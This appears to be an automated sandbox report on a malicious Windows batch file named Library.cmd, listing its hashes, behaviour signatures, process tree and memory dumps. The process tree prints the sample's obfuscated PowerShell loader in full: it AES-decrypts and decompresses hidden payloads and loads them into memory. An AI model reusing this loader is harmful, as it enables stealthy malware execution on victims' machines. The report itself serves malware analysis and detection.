1a357366ee69f83a9c091ee775a44e5cc0fbc2524a50332f9ed261f9ca2d727b

Resubmissions

25-07-2024 23:32

240725-3jrj5sverf 8

25-07-2024 19:34

240725-x96h4azenm 8

25-07-2024 17:53

240725-wgedgaveml 8

25-07-2024 17:32

240725-v4d6jsxekd 8

Analysis

max time kernel
842s
max time network
844s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
25-07-2024 17:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Library.cmd
Size

3.3MB
MD5

705ac80b02f73faec8180190bd2b8ce2
SHA1

4f1e20556015edeee8795ea7ef6137b4341b3d80
SHA256

1a357366ee69f83a9c091ee775a44e5cc0fbc2524a50332f9ed261f9ca2d727b
SHA512

da1981a69dee947f2e490c07d452a2881b7a01d09bd6de70ebd9df648db6d8804bbdccff62c40d1a6796ff77ce107cfd01f1dce24369b2b973081c78e5d0de56
SSDEEP

49152:8e90YDSczQOfmBTZ7fSU13LvMeEZng0PJFGrbxM+:0

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2832	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2096 wrote to memory of 2732	2096	cmd.exe	31
PID 2096 wrote to memory of 2732	2096	cmd.exe	31
PID 2096 wrote to memory of 2732	2096	cmd.exe	31
PID 2732 wrote to memory of 2808	2732	cmd.exe	33
PID 2732 wrote to memory of 2808	2732	cmd.exe	33
PID 2732 wrote to memory of 2808	2732	cmd.exe	33
PID 2732 wrote to memory of 2832	2732	cmd.exe	34
PID 2732 wrote to memory of 2832	2732	cmd.exe	34
PID 2732 wrote to memory of 2832	2732	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Library.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Library.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Library.cmd';$aYUO='LEWmKoaEWmKdEWmK'.Replace('EWmK', ''),'FEbiYrEbiYomBEbiYaseEbiY64EbiYStrEbiYinEbiYgEbiY'.Replace('EbiY', ''),'Invkamvokamvkkamvekamv'.Replace('kamv', ''),'TrvTXdavTXdnvTXdsfvTXdovTXdrmvTXdFinvTXdalvTXdBlovTXdckvTXd'.Replace('vTXd', ''),'CojZDOpjZDOyTjZDOojZDO'.Replace('jZDO', ''),'SplzVMQitzVMQ'.Replace('zVMQ', ''),'GeRWEbtRWEbCuRWEbrreRWEbntRWEbPrRWEboceRWEbsRWEbsRWEb'.Replace('RWEb', ''),'ChNhmQaNhmQnNhmQgeENhmQxNhmQtenNhmQsiNhmQonNhmQ'.Replace('NhmQ', ''),'EnoyyatoyyaryoyyaPooyyainoyyatoyya'.Replace('oyya', ''),'ElxdPsexdPsmxdPsenxdPstxdPsAtxdPs'.Replace('xdPs', ''),'Dblyiecblyiomblyipblyirblyieblyisblyisblyi'.Replace('blyi', ''),'MaAIfzinAIfzMoAIfzduAIfzleAIfz'.Replace('AIfz', ''),'RearCLadarCLLiarCLnesarCL'.Replace('arCL', ''),'CqIOIreaqIOItqIOIeDqIOIeqIOIcrqIOIypqIOItoqIOIrqIOI'.Replace('qIOI', '');powershell -w hidden;function IocxM($diQol){$NvznA=[System.Security.Cryptography.Aes]::Create();$NvznA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NvznA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NvznA.Key=[System.Convert]::($aYUO[1])('kL1UBtUuFDE9V9LM/Uk/WvdRxJsjj9H6CX3jPEUZ+No=');$NvznA.IV=[System.Convert]::($aYUO[1])('jvlbrCPvcqHagDjBk0TemQ==');$cPnJJ=$NvznA.($aYUO[13])();$gpChW=$cPnJJ.($aYUO[3])($diQol,0,$diQol.Length);$cPnJJ.Dispose();$NvznA.Dispose();$gpChW;}function uBxZK($diQol){$RwHhF=New-Object System.IO.MemoryStream(,$diQol);$fYqcC=New-Object System.IO.MemoryStream;$dpVKq=New-Object System.IO.Compression.GZipStream($RwHhF,[IO.Compression.CompressionMode]::($aYUO[10]));$dpVKq.($aYUO[4])($fYqcC);$dpVKq.Dispose();$RwHhF.Dispose();$fYqcC.Dispose();$fYqcC.ToArray();}$iBXfm=[System.IO.File]::($aYUO[12])([Console]::Title);$Hnkcn=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 5).Substring(2))));$AFLeb=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 6).Substring(2))));[System.Reflection.Assembly]::($aYUO[0])([byte[]]$AFLeb).($aYUO[8]).($aYUO[2])($null,$null);[System.Reflection.Assembly]::($aYUO[0])([byte[]]$Hnkcn).($aYUO[8]).($aYUO[2])($null,$null); "
    3⤵
    PID:2808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2832

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2832-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp

Filesize
4KB

Download
memory/2832-5-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-6-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2832-7-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download
memory/2832-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download